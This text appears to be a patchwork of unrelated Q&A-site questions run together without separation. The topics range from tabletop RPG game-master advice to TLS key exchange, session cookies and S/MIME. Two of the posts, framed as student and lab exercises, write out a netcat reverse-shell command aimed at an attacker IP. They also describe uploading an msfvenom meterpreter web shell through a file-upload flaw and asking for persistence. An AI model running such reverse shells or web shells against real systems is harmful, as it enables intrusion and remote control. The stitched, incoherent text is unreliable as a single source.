As a GM, what kind of techniques could I use to help a player re-join the gaming session after their character dies? I want to avoid any major interruptions to the flow of the adventure. I would also like to avoid having to end the session immediately or making them sit on the side-lines for the rest of the session.
I understand that I should only visit https:// websites, have a good antivirus, check the router for signs of DNS issues.
What other precautions can one take?
I am a student working on an ethical hacking project.
How do I set a netcat session over the internet? My project requires us to use a public service like AWS or DigitalOcean as the victim machine and my own PC has an attacker machine. I tried the following commands:
Attacker’s machine running the latest Kali 2020.3 (Tried NAT VM setup and live booting too):
nc –nlvp 5555
Victim’s machine running ubuntu 18.04.05:
/bin/sh | nc <PUBLIC IP OF ATTACKER's MACHINE> 5555
But it just does not open a reverse shell on the attacker’s machine. Did I miss out anything?
I am going to explain this with an example Jake and Kevin own a company called facebook, they want a means of advertisement so they create an account named facebook and immediately after creating it both of them login to the account and start advertising, later Jake wanted to change the name of their company to stackoverflow so he went to the settings and did just that, problem now is that on jakes laptop the name is stackoverflow but on kevin’s laptop the name is facebook How can i make it that at the point of submission my php script checks if the user name for anyother session is facebook and change it to stackoverflow
I have a question about the Key Exchange Algorithm used in TLS process. I have read that the Key Exchange algorithm is used by client and server to exchange session keys. Do the client and server exchange session keys at the end of Handshake process? If they arrive mathematically at the same results for session keys at the end of the process, why would they exchange them?
I am currently DMing for a group of 5 players. A friend of some of the players is very interested in learning about the game.
I have decided to let her play an NPC in one of the upcoming sessions, to gain more insight into this game.
This NPC is already fleshed out and will be an integral part of the story, when she shows up. Therefore I am not able to completely adapt this NPC to the guests wishes.
I have so far tried to describe as much as possible of the NPC, it’s place in the world, family, motivation etc. to the guest. Also some key behaviours, that are relevant to the gameplay. I.e. how she needs to react, what she needs to tell the PCs when asked for it.
Nevertheless, our guest is still rather nervous about the upcoming session. As we probably all were in our first sessions. I am trying to encourage and support her as much as possible, and I am sure she will do fine.
Nevertheless, I am still wondering if there are specific things I could do to help her in this role and to make her experience great?
I know this situation is very similar to having a new player join a group. And I have read many discussions/answers regarding this situation. But this situation is slightly different since she was not able to choose her own character, but has to act out my pre-written NPC. She will be more limited, than if she could just do her own character.
I just set up a lab with bwapp and wanted to jump straight into webshell. I used Unrestricted file upload vuln –> uploaded my perfect shell created with msfvenom.
My only problem is that my session doesn’t seem persistent as I’m getting Meterpreter session opened and then died.
For more context, bwapp is on a bridged network vbox and my kali is also bridged.
php/meterpreter_reverse_tcp etc etc.
I need persistence (RCE)
Some background first. A while back I ran a paranoia session that ended up having about 10 players joining, in order to facilitate running a friend who is also an experienced DM offered to support in running the session. Between us we split the DM duties handling messages from players as they attempted to betray and backstab each other, Taking it in turns to role play friend computer (ignoring most of what we had each said to add more chaos and confusion) and taking on different aspects of the game between us.
This worked really well for Paranoia which lends itself to a bit of chaos however a smaller group have now asked us about co GMing a more traditional system, we are considering either DnD, Cybwrpunk or deadlands but, before we decide a system we want to work out the best way to run this.
Is there Any advice or suggestions, or direction to good resources to talk through the pitfalls and issues that can arise and the best way to manage the GM activities
Background: I’ve been using a simple session cookie design for my web app. I have a
users table, and a
sessions table that basically looks like this:
id | user_id | visited_at -----+---------+----------- int | int | timestamp
And a session cookie contains just a session ID, signed with a secret key. I give the cookie an expiration date (but the source of truth is still the timestamp in the DB), and make sure it’s secure and HTTP-only.
Then I came across these threads:
I think tptacek is basically saying that, instead of storing the signed session ID in the cookie, I can make the
sessions table like this:
id | user_id | visited_at ---------+---------+----------- varchar | int | timestamp
id is a randomly generated 16+ byte key encoded as a string, and simply store this string in the session cookie w/o any encryption/signing.
Is this approach secure? Does it have any downsides due to the lack of a signing phase? (I was thinking w/o signing we can’t invalidate all sessions by changing the server secret, but then I think we can just delete all the session from the DB since we are not doing stateless authentication anyway.)
UPDATE: I think maybe one benefit of the signing approach is that I can save some space in my DB by using an integer primary key. But I’m more interested in the security aspect.
I’ve been preparing for a CISSP exam and was reading about applied cryptography in regard to email.
It’s my understanding that the popular schemes (PGP,S/Mime) use a combination of asymmetric and symmetric cryptography. If I’m reading things correctly, in S/MIME, the message is encrypted using a sender generated symmetric key. In turn, the symmetric key is encrypted using the receiver’s public key.
If the receiver changed their private key, they would no longer be able to decrypt the message. However, I was wondering if it was possible to recover the symmetric key from when the email was previously opened?
My guess would be that the email client does not intentionally store the key since that would present a security risk. Just wanted to see if that actually occurs or if there’s something I’m missing.